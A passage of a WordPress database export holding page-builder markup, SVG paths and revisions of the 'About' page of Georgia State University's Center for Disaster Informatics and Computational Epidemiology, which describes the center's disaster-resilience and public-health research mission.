d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-215 style-local-22-h27\">\n <!---->\n <!---->\n <h3 class=\"\">Center for Disaster Informatics & Computational Epidemiology</h3>\n </div>\n </div>\n <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enabling Data-Driven Disaster Assessment & Planning\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\" data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 15:45:52','2022-02-16 15:45:52','',22,'https://gsudice.dataconn.net/?p=339',0,'revision','',0),(343,1,'2022-02-16 15:56:46','2022-02-16 15:56:46','','visuals-0RPf107BLek-unsplash','','inherit','open','closed','','visuals-0rpf107blek-unsplash','','','2022-02-16 15:56:46','2022-02-16 15:56:46','',122,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/visuals-0RPf107BLek-unsplash.jpg',0,'attachment','image/jpeg',0),(344,1,'2022-02-16 16:00:02','2022-02-16 16:00:02','<!-- wp:image {\"align\":\"right\",\"id\":104,\"width\":354,\"height\":248,\"sizeSlug\":\"large\",\"linkDestination\":\"none\",\"style\":{\"color\":{\"duotone\":[\"#1900d8\",\"#ffa96b\"]}}} -->\n<div class=\"wp-block-image\"><figure class=\"alignright size-large is-resized\"><img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-marc-szeglat-BsAzhHIIwxg-unsplash-scaled-1-1024x716.jpg\" alt=\"\" class=\"wp-image-104\" width=\"354\" height=\"248\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) at Georgia State University brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. To mount an effective response to disasters, it is imperative that regional public health departments continuously engage in the development of mitigation strategies for various hazards that may affect the region.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"align\":\"left\",\"width\":-440,\"height\":-290} -->\n<div class=\"wp-block-image\"><figure class=\"alignleft is-resized\"><img width=\"-440\" height=\"-290\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The center’s mission is to consolidate expertise from multiple disciplines to identify determinants that impede regions’ resilience to natural or human-made disasters or indicate the existence of access disparities to mitigation resources or health services. Collaboration among researchers from Computer Science, Geography (GIS), Public Health, Policy Studies, Biology, etc., is imperative to develop methods capable of addressing the complex and multifaceted problems related to Population Health and Disaster Response Planning. </p>\n<!-- /wp:paragraph -->','About','','inherit','closed','closed','','122-revision-v1','','','2022-02-16 16:00:02','2022-02-16 16:00:02','',122,'https://gsudice.dataconn.net/?p=344',0,'revision','',0),(346,1,'2022-02-16 16:01:52','2022-02-16 16:01:52','','cdc','','inherit','open','closed','','cdc','','','2022-02-16 16:01:52','2022-02-16 16:01:52','',122,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cdc.jpg',0,'attachment','image/jpeg',0),(347,1,'2022-02-16 16:03:46','2022-02-16 16:03:46','<!-- wp:image {\"align\":\"right\",\"id\":104,\"width\":267,\"height\":187,\"sizeSlug\":\"large\",\"linkDestination\":\"none\",\"style\":{\"color\":{\"duotone\":[\"#1900d8\",\"#ffa96b\"]}}} -->\n<div class=\"wp-block-image\"><figure class=\"alignright size-large is-resized\"><img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-marc-szeglat-BsAzhHIIwxg-unsplash-scaled-1-1024x716.jpg\" alt=\"\" class=\"wp-image-104\" width=\"267\" height=\"187\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) at Georgia State University brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. To mount an effective response to disasters, it is imperative that regional public health departments continuously engage in the development of mitigation strategies for various hazards that may affect the region.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"align\":\"left\",\"id\":346,\"width\":245,\"height\":161,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"alignleft size-large is-resized\"><img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cdc-1024x677.jpg\" alt=\"\" class=\"wp-image-346\" width=\"245\" height=\"161\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>The center’s mission is to consolidate expertise from multiple disciplines to identify determinants that impede regions’ resilience to natural or human-made disasters or indicate the existence of access disparities to mitigation resources or health services.</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','About','','inherit','closed','closed','','122-revision-v1','','','2022-02-16 16:03:46','2022-02-16 16:03:46','',122,'https://gsudice.dataconn.net/?p=347',0,'revision','',0),(348,1,'2022-02-16 16:03:56','2022-02-16 16:03:56','<!-- wp:image {\"align\":\"right\",\"id\":104,\"width\":267,\"height\":187,\"sizeSlug\":\"large\",\"linkDestination\":\"none\",\"style\":{\"color\":{\"duotone\":[\"#1900d8\",\"#ffa96b\"]}}} -->\n<div class=\"wp-block-image\"><figure class=\"alignright size-large is-resized\"><img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-marc-szeglat-BsAzhHIIwxg-unsplash-scaled-1-1024x716.jpg\" alt=\"\" class=\"wp-image-104\" width=\"267\" height=\"187\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) at Georgia State University brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. To mount an effective response to disasters, it is imperative that regional public health departments continuously engage in the development of mitigation strategies for various hazards that may affect the region.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"align\":\"left\",\"id\":346,\"width\":245,\"height\":161,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"alignleft size-large is-resized\"><img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cdc-1024x677.jpg\" alt=\"\" class=\"wp-image-346\" width=\"245\" height=\"161\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p><em>The center’s mission is to consolidate expertise from multiple disciplines to identify determinants that impede regions’ resilience to natural or human-made disasters or indicate the existence of access disparities to mitigation resources or health services.</em></p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','About','','inherit','closed','closed','','122-revision-v1','','','2022-02-16 16:03:56','2022-02-16 16:03:56','',122,'https://gsudice.dataconn.net/?p=348',0,'revision','',0),(351,1,'2022-02-16 18:06:17','2022-02-16 18:06:17','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp','cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp','','inherit','open','closed','','cropped-cropped-eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9-1-webp','','','2022-02-16 18:06:17','2022-02-16 18:06:17','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp',0,'attachment','image/webp',0),(352,1,'2022-02-16 18:12:20','2022-02-16 18:12:20','','colibri-image-381.png','','inherit','open','closed','','colibri-image-381-png','','','2022-02-16 18:12:20','2022-02-16 18:12:20','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/colibri-image-381.png',0,'attachment','image/png',0),(353,1,'2022-02-16 18:12:26','2022-02-16 18:12:26','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":1,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c4\",\"index\":2,\"id\":\"122-c7\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities.<\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c3\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c11\",\"parentId\":\"122-c10\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c12\",\"parentId\":\"122-c10\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c12\",\"index\":0,\"id\":\"122-c13\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c12\",\"index\":2,\"id\":\"122-c14\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c10\",\"parentId\":\"122-c9\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c9\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','publish','closed','closed','','353','','','2024-11-07 12:22:25','2024-11-07 17:22:25','',0,'https://gsudice.dataconn.net/?post_type=extb_post_json&p=353',0,'extb_post_json','',0),(354,1,'2022-02-16 18:12:26','2022-02-16 18:12:26','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c6\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c6 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c7\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c7 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c8-outer\">\n <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c9\" class=\"h-global-transition-all h-heading style-288 style-local-122-c9 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-288 style-local-122-c9\">\n <!---->\n <!---->\n <h5 class=\"\">Who are we?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c10\" class=\"h-global-transition-all h-heading style-289 style-local-122-c10 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-289 style-local-122-c10\">\n <!---->\n <!---->\n <h4 class=\"\">The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University</h4>\n </div>\n </div>\n <div data-colibri-id=\"122-c11\" class=\"h-text h-text-component style-290 style-local-122-c11 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. To mount an effective response to disasters,\n it is imperative that regional public health departments continuously engage in the development of mitigation strategies for various hazards that may affect the region</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c12-outer\">\n <div data-colibri-id=\"122-c12\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c12 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c13\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c13 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c14\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c14 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c15-outer\">\n <div data-colibri-id=\"122-c15\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c15 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c16-outer\">\n <div data-colibri-id=\"122-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c17\" class=\"h-global-transition-all h-heading style-296 style-local-122-c17 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-296 style-local-122-c17\">\n <!---->\n <!---->\n <h5 class=\"\">What do we do?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c19\" class=\"h-text h-text-component style-298 style-local-122-c19 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c35\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c35 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c38\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c38 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex 